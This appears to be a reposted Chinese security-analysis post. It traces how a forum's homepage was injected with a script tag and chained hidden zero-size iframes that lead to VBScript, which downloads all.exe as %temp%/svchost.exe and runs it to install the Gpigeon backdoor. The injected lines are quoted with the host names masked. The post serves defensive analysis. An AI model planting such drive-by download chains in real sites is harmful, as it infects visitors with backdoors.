备案控制台

开发者社区开发与运维文章正文

某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码

2024-09-29 48

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码

论坛首页包含代码：

/----
＜script src="hxxp://www.4**884**6*6.com.**/AdOpen***.asp?Adid=41&MyUserID=dy16"＞＜/script＞
----/

AdOpen***.asp　中包含代码：

/----
＜IFRAME frameBorder=0 height=0 scrolling=no src=hxxp://www***1*.site**e***m.com/***19/0**7/tx**049326/other/wu.htm width=0＞＜/IFRAME＞
----/

wu.htm 中包含代码：

/----
＜iframe src="xskj.htm" width="0" height="0" border="0"＞＜/iframe＞
----/

xskj.htm 中包含“Ja va script”脚本代码，功能是调用upescape()输出字符串。

输出字符串是中包含多余空格的VBScript脚本代码，功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 all.exe，保存为 %temp%/svchost.exe，然后调用自定义函数yunxingexe(m5,Xskj9)。

自定义函数yunxingexe()的功能是创建Shell.Application 对象XsKje，利用 XsKje 的 ShellExecute 方法来运行 %temp%/svchost.exe。

文章标签：

Java

.NET

开发框架

游客qeoynko2nmbgk

目录

相关文章

亿格云Eaglecloud

|

9月前

|

云安全安全网络协议

安全研究所 | 伪装搜狗输入法的木马分析

近年来，黑灰产业的犯罪团伙数量急剧上升，特别是在与办公软件相关领域。这些团伙主要针对国内企业用户，通过伪装成合法的办公软件进行精心设计的诈骗和诱导行为，其主要目的是欺骗企业员工下载并激活木马病毒，以此来窃取公司资金或获取企业敏感文件。

亿格云Eaglecloud

291 1 1

游客qeoynko2nmbgk

|

5月前

|

数据安全/隐私保护

一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站

一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站

游客qeoynko2nmbgk

28 1 1

游客qeoynko2nmbgk

|

5月前

|

安全 JavaScript 前端开发

[07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)

[07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)

游客qeoynko2nmbgk

54 0 0

游客qeoynko2nmbgk

|

5月前

|

安全

[2006-04-12]一个下载传奇盗号木马的网站(第2版)

[2006-04-12]一个下载传奇盗号木马的网站(第2版)

游客qeoynko2nmbgk

19 0 0

游客qeoynko2nmbgk

|

5月前

|

安全 JavaScript 前端开发

小心冒充瑞星专家的病毒ravexp.exe

小心冒充瑞星专家的病毒ravexp.exe

游客qeoynko2nmbgk

42 0 0

sumith

|

9月前

|

安全 Shell

2021Kali -- 木马免杀制作

2021Kali -- 木马免杀制作

sumith

122 1 1

Gcow安全团队

|

安全索引 Windows

干货丨windows内核www漏洞利用手法（修改版）

注:由于上次发出来的不完整，所以删除了重新发完整点的前言：Gcow安全团队复眼小组致力于对漏洞的挖掘和研究,并且对于二进制和web漏洞方面都有所研究,有独立挖掘漏洞和独立复现漏洞的能力，本篇文章由Gcow安全团队复眼小组晏子霜师傅所写！

Gcow安全团队

227 0 0

游客r774rqf2u4xgs

|

存储安全网络安全

web渗透_一句话木马（webshell）_dvwa环境

web渗透_一句话木马（webshell）_dvwa环境

游客r774rqf2u4xgs

397 0 0

web渗透_一句话木马（webshell）_dvwa环境

游客wsstyi5j3qrwg

|

安全 Linux 测试技术

Metasploit 实现木马生成、捆绑及免杀

在渗透测试的过程中，避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段，而为了躲避杀毒软件的查杀，我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。木马文件风险高，想要免杀需要用shellter工具捆绑下，但是处理后木马文件还是能被360检测到拦截下来。

游客wsstyi5j3qrwg

1467 0 0

雷锋网

|

安全

Windows10被曝漏洞，受害者电脑沦为“肉鸡”

一旦被攻击者利用，电脑里的任何应用都可能拥有系统权限，攻击者可以执行危害级别更高的恶意行为，受害者电脑沦为“肉鸡”。

雷锋网

453 0 0

热门文章

最新文章

解决kafka集群由于默认的__consumer_offsets这个topic的默认的副本数为1而存在的单点故障问题

使用 Docker 高效搭建本地开发环境（详细教程）

如何使用java代码导出word

《Python编程从0到1》笔记1——表达式的风格（前缀、中缀、后缀）

Nginx目录文件列表显示

中移动与阿里巴巴将在四大领域展开全面战略合作

mysql 主从复制配置

google guice @inject comments

html页面中event的常见应用

微软要在年内推出IPTV平台抢占客厅市场

一级倒立摆平衡控制系统MATLAB仿真,可显示倒立摆平衡动画,对比极点配置,线性二次型,PID,PI及PD五种算法

基于SOA海鸥优化算法的三维曲面最高点搜索matlab仿真

基于PI控制的三相整流器控制系统的simulink建模与仿真,包含超级电容充电和电机

MCMS：Star 28.1k,还在为CMS系统发愁？这款开源神器让内容管理变得像搭积木一样简单！

XJ-Survey：这个让滴滴日均处理1.2亿次问卷请求的开源系统，今天终于公开了它的架构密码！

CPU can only see the threads

Java+机器学习基础：打造AI学习基础

使用 pipx 安装并执行 Python 应用程序 (1)

国产AI神器Deepseek，本地离线使用教程！

短视频创作助手 | AI剧本生成与动画创作

相关电子书

更多

15分钟打造你自己的小程序更新版

低代码开发师（初级）实战教程

阿里巴巴DevOps 最佳实践手册

下一篇

PAI Model Gallery 支持云上一键部署 DeepSeek-V3、DeepSeek-R1 系列模型